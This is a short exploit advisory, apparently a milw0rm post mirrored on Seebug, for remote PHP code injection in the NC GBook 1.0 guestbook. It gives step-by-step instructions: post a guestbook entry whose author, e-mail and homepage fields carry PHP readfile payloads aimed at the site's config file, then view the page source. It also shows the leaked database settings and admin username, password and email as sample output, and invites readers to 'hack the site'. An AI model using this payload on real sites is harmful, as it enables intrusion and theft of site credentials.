-------------------------------------------------------------- NC GBook 1.0 Remote Command injection Exploit --------------------------------------------------------------- Founder :ThE g0bL!N Vendor:http://www.php-gaestebuch.com Thank You Very Much His0k4 Download:http://www.php-gaestebuch.com/downloads/1.0/ Note: You Can choose Any Function in Php :) --------------------------------------------------------------- Exploit: -------- 1) Go To Url: --------- http://wwww.victim.co.il/[path]/index.php?gbAction=add . 2) Write In: -------- Autor: <? readfile("./config/config.php"); ?>. E-Mail: <? readfile("./config/config.php"); ?>. Homepage:<? readfile("./config/config.php"); ?>. 3) Post The Topic: -------------- 4) View Source: ----------- 5) Hack The site :) --------------- Exapmle: -------- $gbConfig['database']['system'] = "mysql"; $gbConfig['database']['server'] = "localhost"; $gbConfig['database']['user'] = ""; $gbConfig['database']['password'] = ""; $gbConfig['database']['name'] = ""; ---------------------------------------- $gbConfig['admin_username'] = "ThE g0bL!N"; $gbConfig['admin_password'] = "sh5d81d6zs7yt4g41g"; $gbConfig['admin_email'] = "x0q@hotmail.fr"; -------------------------------------------------- Demo: ---- http://www.php-gaestebuch.com/demo/ ---------------------------------------------------------------- Greetz : His0k4 Dos-Dz TeaM Snakes TeaM And All My Freinds (dz) ----------------------------------------------------------------- # milw0rm.com [2009-05-20]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论